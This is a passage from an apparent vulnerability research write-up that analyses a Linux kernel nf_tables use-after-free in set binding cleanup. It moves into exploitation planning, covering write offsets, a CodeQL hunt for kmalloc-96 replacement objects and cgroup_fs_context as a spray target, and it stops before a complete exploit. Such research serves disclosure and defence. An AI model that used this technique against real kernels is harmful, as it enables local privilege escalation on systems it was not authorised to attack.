The vulnerability is due to a failure to properly clean up when a “lookup” or “dynset” expression is encountered when creating a set using NFT_MSG_NEWSET. The nf_tables_newset() function is responsible for handling the NFT_MSG_NEWSET netlink message. Let’s first look at this function.

From nf_tables_api.c:

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4189
    static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
                                const struct nlattr * const nla[])
    {
        const struct nfgenmsg *nfmsg = nlmsg_data(info->nlh);
        u32 ktype, dtype, flags, policy, gc_int, objtype;
        struct netlink_ext_ack *extack = info->extack;
        u8 genmask = nft_genmask_next(info->net);
        int family = nfmsg->nfgen_family;
        const struct nft_set_ops *ops;
        struct nft_expr *expr = NULL;
        struct net *net = info->net;
        struct nft_set_desc desc;
        struct nft_table *table;
        unsigned char *udata;
        struct nft_set *set;
        struct nft_ctx ctx;
        size_t alloc_size;
        u64 timeout;
        char *name;
        int err, i;
        u16 udlen;
        u64 size;

    [1] if (nla[NFTA_SET_TABLE] == NULL ||
            nla[NFTA_SET_NAME] == NULL ||
            nla[NFTA_SET_KEY_LEN] == NULL ||
            nla[NFTA_SET_ID] == NULL)
            return -EINVAL;

When creating a set we need to specify an associated table, as well as providing a set name, key len, and id shown above at [1]. Assuming all the basic prerequisites are matched, this function will allocate a nft_set structure to track the newly created set:

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4354
        set = kvzalloc(alloc_size, GFP_KERNEL);
        if (!set)
            return -ENOMEM;

        [...]

    [2] INIT_LIST_HEAD(&set->bindings);
        INIT_LIST_HEAD(&set->catchall_list);
        set->table = table;
        write_pnet(&set->net, net);
        set->ops = ops;
        set->ktype = ktype;
        set->klen = desc.klen;
        set->dtype = dtype;
        set->objtype = objtype;
        set->dlen = desc.dlen;
        set->flags = flags;
        set->size = desc.size;
        set->policy = policy;
        set->udlen = udlen;
        set->udata = udata;
        set->timeout = timeout;
        set->gc_int = gc_int;

We can see above at [2] that it initializes the set->bindings list, which will be interesting later.
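The prerequisite check at [1] follows a common netlink pattern: parsed attributes arrive as an array of pointers indexed by attribute type, and a missing attribute is simply a NULL slot. A minimal userspace model of that check is sketched below. The `ATTR_*` indices are illustrative placeholders, not the real NFTA_SET_* values, and `check_newset_attrs` is a hypothetical helper.

```c
#include <errno.h>
#include <stddef.h>

/* Illustrative attribute indices; NOT the real NFTA_SET_* numbering. */
enum {
    ATTR_TABLE,
    ATTR_NAME,
    ATTR_KEY_LEN,
    ATTR_ID,
    ATTR_USERDATA, /* optional in this model */
    ATTR_MAX
};

/*
 * Reject the request unless every mandatory attribute is present.
 * Returns 0 if all are present, -EINVAL otherwise.
 */
int check_newset_attrs(const void *const attrs[ATTR_MAX])
{
    static const int required[] = {
        ATTR_TABLE, ATTR_NAME, ATTR_KEY_LEN, ATTR_ID
    };

    for (size_t i = 0; i < sizeof(required) / sizeof(required[0]); i++) {
        if (attrs[required[i]] == NULL)
            return -EINVAL;
    }
    return 0;
}
```

In this model the optional user data slot may be NULL without causing a failure, which matches the earlier observation that a set can be created with or without user data.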

After initialization is complete, the function will test whether or not there are any expressions associated with the set:

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4401
        if (nla[NFTA_SET_EXPR]) {
    [3]     expr = nft_set_elem_expr_alloc(&ctx, set, nla[NFTA_SET_EXPR]);
            if (IS_ERR(expr)) {
                err = PTR_ERR(expr);
    [4]         goto err_set_expr_alloc;
            }
            set->exprs[0] = expr;
            set->num_exprs++;
        } else if (nla[NFTA_SET_EXPRESSIONS]) {
            [...]
        }

We can see above if NFTA_SET_EXPR is found, then a call will be made to nft_set_elem_expr_alloc() at [3], to handle whatever the expression type is. If the allocation of the expression fails, then it will jump to a label responsible for destroying the set at [4].

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4448
    err_set_expr_alloc:
        for (i = 0; i < set->num_exprs; i++)
    [5]     nft_expr_destroy(&ctx, set->exprs[i]);

        ops->destroy(set);
    err_set_init:
        kfree(set->name);
    err_set_name:
        kvfree(set);
        return err;
    }

We see above that even if only one expression fails to initialize, all the associated expressions will be destroyed with nft_expr_destroy() at [5]. However, note that in the err_set_expr_alloc case above, the expression that failed initialization will not have been added to the set->exprs array, so it will not be destroyed here. It will have already been destroyed earlier inside of nft_set_elem_expr_alloc(), which we will see in a second.

The set element expression allocation function nft_set_elem_expr_alloc() is quite simple:

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L5304
    struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
                                             const struct nft_set *set,
                                             const struct nlattr *attr)
    {
        struct nft_expr *expr;
        int err;

    [6] expr = nft_expr_init(ctx, attr);
        if (IS_ERR(expr))
            return expr;

        err = -EOPNOTSUPP;
    [7] if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL))
            goto err_set_elem_expr;

        if (expr->ops->type->flags & NFT_EXPR_GC) {
            if (set->flags & NFT_SET_TIMEOUT)
                goto err_set_elem_expr;
            if (!set->ops->gc_init)
                goto err_set_elem_expr;
            set->ops->gc_init(set);
        }

        return expr;

    err_set_elem_expr:
    [8] nft_expr_destroy(ctx, expr);
        return ERR_PTR(err);
    }

The function will first initialize an expression at [6], and then only afterwards will it check whether that expression type is actually of an acceptable type to be associated with the set, namely NFT_EXPR_STATEFUL at [7].

This backwards order of state checking allows for the initialization of an arbitrary expression type that may not be usable with a set. This in turn means that anything initialized at [6] that doesn’t get destroyed properly in this context could be left lingering. As noted earlier, there are only a handful (4) of NFT_EXPR_STATEFUL compatible expressions, but this lets us first initialize an expression of any type.

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L2814
    void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr)
    {
    [9] nf_tables_expr_destroy(ctx, expr);
        kfree(expr);
    }

We see above that the destruction routine at [8] will call the destruction function associated with the expression via nf_tables_expr_destroy at [9], and then free the expression.
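The init-then-check ordering of [6], [7] and [8] can be reproduced in a small userspace model. This is a sketch under stated assumptions: the `toy_*` names are hypothetical, the two counters stand in for whatever side effects a real expression’s init and destroy callbacks have, and the NFT_EXPR_GC branch is omitted for brevity. The flag values mirror the kernel’s definitions of NFT_EXPR_STATEFUL and NFT_EXPR_GC.

```c
#include <errno.h>
#include <stdlib.h>

#define NFT_EXPR_STATEFUL 0x1
#define NFT_EXPR_GC       0x2

struct toy_expr_type { const char *name; unsigned int flags; };
struct toy_expr { const struct toy_expr_type *type; };

/* Counters standing in for type-specific init/destroy side effects. */
int toy_init_calls;
int toy_destroy_calls;

static struct toy_expr *toy_expr_init(const struct toy_expr_type *type)
{
    struct toy_expr *expr = malloc(sizeof(*expr));

    if (!expr)
        return NULL;
    expr->type = type;
    toy_init_calls++; /* the type's init hook has already run at this point */
    return expr;
}

void toy_expr_destroy(struct toy_expr *expr)
{
    toy_destroy_calls++; /* the type's destroy hook runs, then memory is freed */
    free(expr);
}

/*
 * Same ordering as in the excerpt: initialize first, validate afterwards.
 * Returns 0 and stores the expression in *out, or a negative errno.
 */
int toy_set_elem_expr_alloc(const struct toy_expr_type *type,
                            struct toy_expr **out)
{
    struct toy_expr *expr = toy_expr_init(type);        /* like [6] */

    if (!expr)
        return -ENOMEM;

    if (!(expr->type->flags & NFT_EXPR_STATEFUL)) {     /* like [7] */
        toy_expr_destroy(expr);                         /* like [8] */
        return -EOPNOTSUPP;
    }

    *out = expr;
    return 0;
}
```

Requesting a type with no flags set returns -EOPNOTSUPP, yet `toy_init_calls` has still been incremented: the rejected type’s init code ran in full, and correctness now depends entirely on the destroy hook undoing everything that init did.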

You would think that because nft_set_elem_expr_alloc calls nft_expr_destroy at [8], there should be nothing left lingering. Indeed, the ability to initialize a non-stateful expression is not a vulnerability in and of itself, but we’ll see very soon that it is partially this behavior that allows vulnerabilities to occur more easily.

Now that we understand things up to this point, we will change focus to see what happens when we initialize a specific type of expression.

We know from the KASAN report that the crash was related to the nft_lookup expression type, so we take a look at the initialization routine there to see what’s up.

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L64
    static int nft_lookup_init(const struct nft_ctx *ctx,
                               const struct nft_expr *expr,
                               const struct nlattr * const tb[])
    {
    [10]struct nft_lookup *priv = nft_expr_priv(expr);
        u8 genmask = nft_genmask_next(ctx->net);

We see that a nft_lookup structure is associated with this expression type at [10], which looks like the following:

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L18
    struct nft_lookup {
        struct nft_set *set;
        u8 sreg;
        u8 dreg;
        bool invert;
        struct nft_set_binding binding;
    };

The struct nft_set_binding type (for the binding member) is defined as follows:

    //https://elixir.bootlin.com/linux/v5.13/source/include/net/netfilter/nf_tables.h#L545
    /**
     * struct nft_set_binding - nf_tables set binding
     *
     * @list: set bindings list node
     * @chain: chain containing the rule bound to the set
     * @flags: set action flags
     *
     * A set binding contains all information necessary for validation
     * of new elements added to a bound set.
     */
    struct nft_set_binding {
        struct list_head list;
        const struct nft_chain *chain;
        u32 flags;
    };

After assigning the lookup structure pointer at [10], the nft_lookup_init() function continues with:

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L74
        struct nft_set *set;
        u32 flags;
        int err;

    [11]if (tb[NFTA_LOOKUP_SET] == NULL ||
            tb[NFTA_LOOKUP_SREG] == NULL)
            return -EINVAL;

        set = nft_set_lookup_global(ctx->net, ctx->table, tb[NFTA_LOOKUP_SET],
                                    tb[NFTA_LOOKUP_SET_ID], genmask);
        if (IS_ERR(set))
            return PTR_ERR(set);

The start of the nft_lookup_init() function above tells us that we need to build a “lookup” expression with a set name to query (NFTA_LOOKUP_SET), as well as a source register (NFTA_LOOKUP_SREG). Then, it will look up a set using the name we specified, which means that the looked up set must already exist.

To be clear, since we’re in the process of creating a set with this “lookup” expression inside of it, we can’t actually look up that set as it is technically not associated with a table yet. It has to be a separate set that we already created earlier.

Assuming the looked up set was found, nft_lookup_init() will continue to handle various other arguments, which we don’t have to provide.

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L115
        [...]
        priv->binding.flags = set->flags & NFT_SET_MAP;

    [12]err = nf_tables_bind_set(ctx, set, &priv->binding);
        if (err < 0)
            return err;

        priv->set = set;
        return 0;
    }

At [12], we see a call to nf_tables_bind_set(), passing in the looked up set, as well as the address of the binding member of the nft_lookup structure.

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4589
    int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
                           struct nft_set_binding *binding)
    {
        struct nft_set_binding *i;
        struct nft_set_iter iter;

        if (set->use == UINT_MAX)
            return -EOVERFLOW;
        [...]
    [13]if (!list_empty(&set->bindings) && nft_set_is_anonymous(set))
            return -EBUSY;

We control the flags for the set that we’re looking up, so we can make sure that it is not anonymous (just don’t specify the NFT_SET_ANONYMOUS flag during creation) and skip over [13].

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4601
        if (binding->flags & NFT_SET_MAP) {
            /* If the set is already bound to the same chain all
             * jumps are already validated for that chain.
             */
            [...]
        }
    bind:
        binding->chain = ctx->chain;
    [14]list_add_tail_rcu(&binding->list, &set->bindings);
        nft_set_trans_bind(ctx, set);
    [15]set->use++;

        return 0;
    }

Assuming a few other checks all pass, the “lookup” expression is then bound to the bindings list of the set with list_add_tail_rcu() at [14]. This puts the nft_lookup structure onto this bindings list. This makes sense since the expression is associated with the set, so we would expect it to be added to some list.





A diagram of normal set binding when two expressions have been added to the bindings list is as follows:

The slab cache in which the expression is allocated varies depending on the expression type.

Tables can also have multiple sets attached. Visually this looks as follows:

Note also that getting our expression onto the sets bindings list increments the set->use ref counter as shown in [15] and mentioned earlier. This will prevent the destruction of the set until the use count is decremented.

Now we have an initialized nft_lookup structure that is bound to a previously created set, and we know that back in nft_set_elem_expr_alloc() it is going to be destroyed immediately because it does not have the NFT_EXPR_STATEFUL flag. Let’s take a look at nft_set_elem_expr_alloc() again:

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L5304
    struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
                                             const struct nft_set *set,
                                             const struct nlattr *attr)
    {
        struct nft_expr *expr;
        int err;

    [16]expr = nft_expr_init(ctx, attr);
        if (IS_ERR(expr))
            return expr;

        err = -EOPNOTSUPP;
        if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL))
            goto err_set_elem_expr;

        if (expr->ops->type->flags & NFT_EXPR_GC) {
            if (set->flags & NFT_SET_TIMEOUT)
                goto err_set_elem_expr;
            if (!set->ops->gc_init)
                goto err_set_elem_expr;
            set->ops->gc_init(set);
        }

        return expr;

    err_set_elem_expr:
    [17]nft_expr_destroy(ctx, expr);
        return ERR_PTR(err);
    }

Above at [16] the expr variable will point to the nft_lookup structure that was just added to the set->bindings list, and that expression type does not have the NFT_EXPR_STATEFUL flag, so we immediately hit [17].

As a side note, to confirm that there is no stateful flag, we can look at where the nft_lookup expression’s nft_expr_type structure is defined and check its flags:

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L237
    struct nft_expr_type nft_lookup_type __read_mostly = {
        .name    = "lookup",
        .ops     = &nft_lookup_ops,
        .policy  = nft_lookup_policy,
        .maxattr = NFTA_LOOKUP_MAX,
        .owner   = THIS_MODULE,
    };

The .flags is not explicitly initialized, which means it will be unset (aka zeroed) and thus not contain NFT_EXPR_STATEFUL. An expression type declaring the flag would look something like this:

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_limit.c#L230
    static struct nft_expr_type nft_limit_type __read_mostly = {
        .name       = "limit",
        .select_ops = nft_limit_select_ops,
        .policy     = nft_limit_policy,
        .maxattr    = NFTA_LIMIT_MAX,
        .flags      = NFT_EXPR_STATEFUL,
        .owner      = THIS_MODULE,
    };

Next, we need to look at the nft_expr_destroy() function to see why the set->bindings entry doesn’t get cleared, as implied by the KASAN report.

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L2814
    void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr)
    {
    [17]nf_tables_expr_destroy(ctx, expr);
        kfree(expr);
    }

As we saw earlier, a destroy routine is called at [17] before freeing the nft_lookup object, so the list removal will have to presumably exist there.

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L2752
    static void nf_tables_expr_destroy(const struct nft_ctx *ctx,
                                       struct nft_expr *expr)
    {
        const struct nft_expr_type *type = expr->ops->type;

        if (expr->ops->destroy)
    [18]    expr->ops->destroy(ctx, expr);
        module_put(type->owner);
    }

This in turn leads us to the actual “lookup” expression’s destroy routine being called at [18].

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L232
    static const struct nft_expr_ops nft_lookup_ops = {
        [...]
    [19].destroy = nft_lookup_destroy,

In the case of nft_lookup, this points us to nft_lookup_destroy as seen in [19]:

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L142
    static void nft_lookup_destroy(const struct nft_ctx *ctx,
                                   const struct nft_expr *expr)
    {
        struct nft_lookup *priv = nft_expr_priv(expr);

    [20]nf_tables_destroy_set(ctx, priv->set);
    }

That function is very simple and only calls the routine to destroy the associated set at [20], so let’s take a look at it.

    void nf_tables_destroy_set(const struct nft_ctx *ctx, struct nft_set *set)
    {
    [21]if (list_empty(&set->bindings) && nft_set_is_anonymous(set))
            nft_set_destroy(ctx, set);
    }

Finally, we see at [21] that the function is actually not going to do anything because set->bindings list is not empty, because the “lookup” expression was just bound to it and never removed. One confusing thing here is that there is no logic for removing the lookup from the set->bindings list at all, which seems to be the real problem.

Set Deactivation

Let’s take a look where the normal removal would occur to understand how this might be fixed.

If we look for the removal of the entry from the bindings list, specifically by looking for references to priv->binding we can see that the removal seems to correspond to the deactivation of the set through the lookup functions:

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L231
    static const struct nft_expr_ops nft_lookup_ops = {
        [...]
        .deactivate = nft_lookup_deactivate,

and

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L125
    static void nft_lookup_deactivate(const struct nft_ctx *ctx,
                                      const struct nft_expr *expr,
                                      enum nft_trans_phase phase)
    {
        struct nft_lookup *priv = nft_expr_priv(expr);

    [22]nf_tables_deactivate_set(ctx, priv->set, &priv->binding, phase);
    }

This function just passes the entry on the binding list to the set deactivation routine at [22], which looks like this:

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4647
    void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
                                  struct nft_set_binding *binding,
                                  enum nft_trans_phase phase)
    {
        switch (phase) {
        case NFT_TRANS_PREPARE:
            set->use--;
            return;
        case NFT_TRANS_ABORT:
        case NFT_TRANS_RELEASE:
            set->use--;
            fallthrough;
        default:
    [23]    nf_tables_unbind_set(ctx, set, binding,
                                 phase == NFT_TRANS_COMMIT);
        }
    }

and this calls at [23]:

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4634
    static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
                                     struct nft_set_binding *binding, bool event)
    {
        list_del_rcu(&binding->list);

        if (list_empty(&set->bindings) && nft_set_is_anonymous(set)) {
            list_del_rcu(&set->list);
            if (event)
                nf_tables_set_notify(ctx, set, NFT_MSG_DELSET,
                                     GFP_KERNEL);
        }
    }

So if there was a proper deactivation, the expression would have been removed from the bindings list. However, in our case, this actually never occurred but the expression is still freed. This means that the set that was looked up now contains a dangling pointer on the bindings list. In the case of the KASAN report, the use-after-free occurs because yet another set is created containing yet another embedded “lookup” expression that looks up the same set that already has the dangling pointer on its bindings list, which will cause the second “lookup” expression to be inserted onto that same list, which will in turn update the linkage of the dangling pointer.
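To make the ordering problem concrete, here is a minimal userland sketch of the flow described above. It is only a model under stated assumptions: `mock_set`, `mock_expr`, and every function below are hypothetical stand-ins, and "freeing" merely sets a flag so that the stale list entry can be inspected safely. The check-first variant illustrates why the order matters; it is not presented as the actual kernel patch.

```c
#include <stdbool.h>
#include <stddef.h>

/* Userland stand-in for the kernel's circular doubly linked list. */
struct list_head { struct list_head *next, *prev; };

static void list_init(struct list_head *h) { h->next = h; h->prev = h; }

static void list_add_tail(struct list_head *n, struct list_head *head)
{
    n->prev = head->prev;
    n->next = head;
    head->prev->next = n;
    head->prev = n;
}

/* Hypothetical models of nft_set and of a "lookup"/"dynset" expression. */
struct mock_set { struct list_head bindings; unsigned int use; };

struct mock_expr {
    bool stateful;            /* models NFT_EXPR_STATEFUL on the type   */
    bool freed;               /* models kfree() without releasing memory */
    struct list_head binding; /* models priv->binding.list               */
};

/* Models ops->init: the expression binds itself to the looked-up set. */
static void mock_expr_init(struct mock_expr *e, struct mock_set *s)
{
    e->freed = false;
    list_add_tail(&e->binding, &s->bindings);
    s->use++;
}

/* Models nft_expr_destroy(): nothing unbinds, the object is just freed. */
static void mock_expr_destroy(struct mock_expr *e) { e->freed = true; }

/* Vulnerable order: initialize first, check the stateful flag afterwards. */
static int alloc_init_then_check(struct mock_expr *e, struct mock_set *s)
{
    mock_expr_init(e, s);
    if (!e->stateful) {
        mock_expr_destroy(e);
        return -1;
    }
    return 0;
}

/* Illustrative safe order: reject the type before it can bind to anything. */
static int alloc_check_then_init(struct mock_expr *e, struct mock_set *s)
{
    if (!e->stateful)
        return -1;
    mock_expr_init(e, s);
    return 0;
}

/* Count entries on set->bindings that refer to already "freed" expressions. */
static int count_dangling(const struct mock_set *s)
{
    int n = 0;
    for (const struct list_head *p = s->bindings.next; p != &s->bindings; p = p->next) {
        const struct mock_expr *e = (const struct mock_expr *)
            ((const char *)p - offsetof(struct mock_expr, binding));
        if (e->freed)
            n++;
    }
    return n;
}

/* Run one scenario and report how many dangling bindings remain. */
int run_scenario(bool check_first)
{
    struct mock_set set = { .use = 0 };
    struct mock_expr lookup = { .stateful = false };

    list_init(&set.bindings);
    if (check_first)
        alloc_check_then_init(&lookup, &set);
    else
        alloc_init_then_check(&lookup, &set);
    return count_dangling(&set);
}
```

Calling `run_scenario(false)` leaves one freed expression on the bindings list, while `run_scenario(true)` leaves none, because the expression never gets the chance to bind.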

Initial Limited UAF Write

We also found that one other expression will be bound to a set in a similar way to the nft_lookup expression, and that is nft_dynset. We can use either of these expressions for exploitation, and as we will see one benefited us more than the other.









To describe this more visually, the following process can erroneously occur.





Firstly, we trigger the vulnerability while adding a nft_dynset expression to the set->bindings list:

This will fail because only stateful expressions may be embedded during set creation, and nft_dynset is not stateful.



Then, we remove the legitimate expression from the bindings list and we end up with a dangling next pointer on the bindings list pointing to a free’d expression.



Finally, by adding another expression to the bindings list, we can cause a UAF write to occur as the prev field will be updated to point to the newly inserted expression (not shown in the above diagram).

Exploitation

Building an Initial Plan

We now know we can create a set with some dangling entry on its bindings list. The first question is how can we best abuse this dangling entry to do something more useful?

We are extremely limited in what can be written into the UAF chunk. Really, there are two possibilities:

- Write the address of the binding member of another expression that is added to the set->bindings list after the UAF is triggered. Interestingly, this additional expression could also be used-after-free if we wanted, so in theory this would mean that the address might point to a subsequent replacement object that contained some more controlled data.

- Write the address of set->bindings into the UAF chunk.

Offsets We Can Write at Into the UAF Chunk

We are interested in knowing at what offset into the UAF chunk this uncontrolled address is written. This will also differ depending on which expression type we choose to trigger the bug with.

For the nft_lookup expression:

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L18
    struct nft_lookup {
        struct nft_set *set;
        u8 sreg;
        u8 dreg;
        bool invert;
        struct nft_set_binding binding;
    };

And the offset information courtesy of pahole:

    struct nft_lookup {
        struct nft_set *           set;                  /*     0     8 */
        u8                         sreg;                 /*     8     1 */
        u8                         dreg;                 /*     9     1 */
        bool                       invert;               /*    10     1 */

        /* XXX 5 bytes hole, try to pack */

        struct nft_set_binding     binding;              /*    16    32 */

        /* XXX last struct has 4 bytes of padding */

        /* size: 48, cachelines: 1, members: 5 */
        /* sum members: 43, holes: 1, sum holes: 5 */
        /* paddings: 1, sum paddings: 4 */
        /* last cacheline: 48 bytes */
    };

For the nft_dynset expression:

    //https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_dynset.c#L15
    struct nft_dynset {
        struct nft_set *set;
        struct nft_set_ext_tmpl tmpl;
        enum nft_dynset_ops op:8;
        u8 sreg_key;
        u8 sreg_data;
        bool invert;
        bool expr;
        u8 num_exprs;
        u64 timeout;
        struct nft_expr *expr_array[NFT_SET_EXPR_MAX];
        struct nft_set_binding binding;
    };

And the pahole results:

    struct nft_dynset {
        struct nft_set *           set;                  /*     0     8 */
        struct nft_set_ext_tmpl    tmpl;                 /*     8    12 */

        /* XXX last struct has 1 byte of padding */

        enum nft_dynset_ops        op:8;                 /*    20: 0  4 */

        /* Bitfield combined with next fields */

        u8                         sreg_key;             /*    21     1 */
        u8                         sreg_data;            /*    22     1 */
        bool                       invert;               /*    23     1 */
        bool                       expr;                 /*    24     1 */
        u8                         num_exprs;            /*    25     1 */

        /* XXX 6 bytes hole, try to pack */

        u64                        timeout;              /*    32     8 */
        struct nft_expr *          expr_array[2];        /*    40    16 */
        struct nft_set_binding     binding;              /*    56    32 */

        /* XXX last struct has 4 bytes of padding */

        /* size: 88, cachelines: 2, members: 11 */
        /* sum members: 81, holes: 1, sum holes: 6 */
        /* sum bitfield members: 8 bits (1 bytes) */
        /* paddings: 2, sum paddings: 5 */
        /* last cacheline: 24 bytes */
    };

The first element of the nft_set_binding structure is the list_head structure:

    struct list_head {
        struct list_head *next, *prev;
    };

Expression structures such as nft_lookup and nft_dynset are prefixed with an nft_expr structure of size 8.

So for nft_lookup the writes will occur at offsets 24 (next) and 32 (prev). For nft_dynset they will occur at offsets 64 (next) and 72 (prev). We can also confirm this by looking at the KASAN report output.
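The offset arithmetic can be double-checked in userland with `offsetof`. The sketch below assumes an LP64 target such as x86-64; the `mock_*` structures are hypothetical stand-ins that only mirror the pahole layouts shown above (for example, `mock_ext_tmpl` is simply a 12-byte, 2-byte-aligned placeholder, and the `op:8` bitfield is modelled as a plain byte).

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

struct list_head { struct list_head *next, *prev; };

struct nft_set_binding {
    struct list_head list;
    const void *chain;
    uint32_t flags;
};

/* Hypothetical placeholder: 12 bytes with 2-byte alignment, as pahole reports. */
struct mock_ext_tmpl { uint16_t len; uint8_t offset[9]; };

/* Mirrors the private data of a "lookup" expression. */
struct mock_lookup {
    void *set;
    uint8_t sreg;
    uint8_t dreg;
    bool invert;
    struct nft_set_binding binding;
};

/* Mirrors the private data of a "dynset" expression. */
struct mock_dynset {
    void *set;
    struct mock_ext_tmpl tmpl;
    uint8_t op;               /* enum bitfield op:8 in the kernel */
    uint8_t sreg_key;
    uint8_t sreg_data;
    bool invert;
    bool expr;
    uint8_t num_exprs;
    uint64_t timeout;
    void *expr_array[2];
    struct nft_set_binding binding;
};

/* The nft_expr header in front of the private data holds a single ops pointer. */
#define NFT_EXPR_HDR sizeof(void *)

size_t lookup_next_off(void)
{
    return NFT_EXPR_HDR + offsetof(struct mock_lookup, binding)
         + offsetof(struct list_head, next);
}

size_t lookup_prev_off(void)
{
    return NFT_EXPR_HDR + offsetof(struct mock_lookup, binding)
         + offsetof(struct list_head, prev);
}

size_t dynset_next_off(void)
{
    return NFT_EXPR_HDR + offsetof(struct mock_dynset, binding)
         + offsetof(struct list_head, next);
}

size_t dynset_prev_off(void)
{
    return NFT_EXPR_HDR + offsetof(struct mock_dynset, binding)
         + offsetof(struct list_head, prev);
}
```

In other words, each write offset is the 8-byte header, plus the offset of `binding` within the private structure (16 or 56), plus 0 for `next` or 8 for `prev`.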

Hunting for Replacement Objects

So we can start looking for other structures with the same size that we can allocate from userland, and with interesting members at the previously mentioned offsets.

We have two options on how to abuse the UAF write after re-allocating some object to replace the UAF chunk:

- We could try to leak the written address out to userland.

- We could use the limited UAF write to corrupt some interesting structure member, and use that to try to build a more useful primitive.

We will actually have to do both, but for now we will focus on the second option.

We ended up using CodeQL to look for interesting structures. We were specifically looking for structures with pointers at one of the relevant offsets.

A copy of the CodeQL query used to find this object is as follows:

    /**
     * @name kmalloc-96
     * @kind problem
     * @problem.severity warning
     */

    import cpp

    // The offsets we care about are 64 and 72.
    from FunctionCall fc, Type t, Variable v, Field f, Type t2
    where
      (fc.getTarget().hasName("kmalloc") or
       fc.getTarget().hasName("kzalloc") or
       fc.getTarget().hasName("kcalloc")) and
      exists(Assignment assign |
        assign.getRValue() = fc and
        assign.getLValue() = v.getAnAccess() and
        v.getType().(PointerType).refersToDirectly(t)) and
      t.getSize() <= 96 and
      t.getSize() > 64 and
      t.fromSource() and
      f.getDeclaringType() = t and
      (f.getType().(PointerType).refersTo(t2) and t2.getSize() <= 8) and
      (f.getByteOffset() = 72)
    select fc, t, fc.getLocation()

After lots of searching, we found an interesting candidate in the structure called cgroup_fs_context. This structure is allocated on kmalloc-96, so it could be used to replace a nft_dynset.

    //https://elixir.bootlin.com/linux/v5.13/source/kernel/cgroup/cgroup-internal.h#L46
    /*
     * The cgroup filesystem superblock creation/mount context.
     */
    struct cgroup_fs_context {
        struct kernfs_fs_context kfc;
        struct cgroup_root *root;
        struct cgroup_namespace *ns;
        unsigned int flags;             /* CGRP_ROOT_* flags */

        /* cgroup1 bits */
        bool cpuset_clone_children;
        bool none;                      /* User explicitly requested empty subsystem */
        bool all_ss;                    /* Seen 'all' option */
        u16 subsys_mask;                /* Selected subsystems */
        char *name;                     /* Hierarchy name */
        char *release_agent;            /* Path for release notifications */
    };

Using pahole, we can see the structure’s layout is as follows:

    struct cgroup_fs_context {
        struct kernfs_fs_context   kfc;                  /*     0    32 */

        /* XXX last struct has 7 bytes of padding */

        struct cgroup_root *       root;                 /*    32     8 */
        struct cgroup_namespace *  ns;                   /*    40     8 */
        unsigned int               flags;                /*    48     4 */
        bool                       cpuset_clone_children; /*    52     1 */
        bool                       none;                 /*    53     1 */
        bool                       all_ss;               /*    54     1 */

        /* XXX 1 byte hole, try to pack */

        u16                        subsys_mask;          /*    56     2 */

        /* XXX 6 bytes hole, try to pack */

        /* --- cacheline 1 boundary (64 bytes) --- */
        char *                     name;                 /*    64     8 */
        char *                     release_agent;        /*    72     8 */

        /* size: 80, cachelines: 2, members: 10 */
        /* sum members: 73, holes: 2, sum holes: 7 */
        /* paddings: 1, sum paddings: 7 */
        /* last cacheline: 16 bytes */
    };

We can see above that the name and release_agent members will overlap with the binding member of nft_dynset. This means we could overwrite them with a pointer relative to a set or another expression with our limited UAF write primitive.

Taking a look at the routines that create a cgroup_fs_context, we first come across cpuset_init_fs_context(), which calls cgroup_init_fs_context():

    /*
     * This is ugly, but preserves the userspace API for existing cpuset
     * users. If someone tries to mount the "cpuset" filesystem, we
     * silently switch it to mount "cgroup" instead
     */
    static int cpuset_init_fs_context(struct fs_context *fc)
    {
        char *agent = kstrdup("/sbin/cpuset_release_agent", GFP_USER);
        struct cgroup_fs_context *ctx;
        int err;

        err = cgroup_init_fs_context(fc);
        if (err) {
            kfree(agent);
            return err;
        }

        fc->ops = &cpuset_fs_context_ops;

        ctx = cgroup_fc2context(fc);
        ctx->subsys_mask = 1 << cpuset_cgrp_id;
        ctx->flags |= CGRP_ROOT_NOPREFIX;
        ctx->release_agent = agent;

        get_filesystem(&cgroup_fs_type);
        put_filesystem(fc->fs_type);
        fc->fs_type = &cgroup_fs_type;

        return 0;
    }

This is where the cgroup_init_fs_context() is used for the actual allocation:

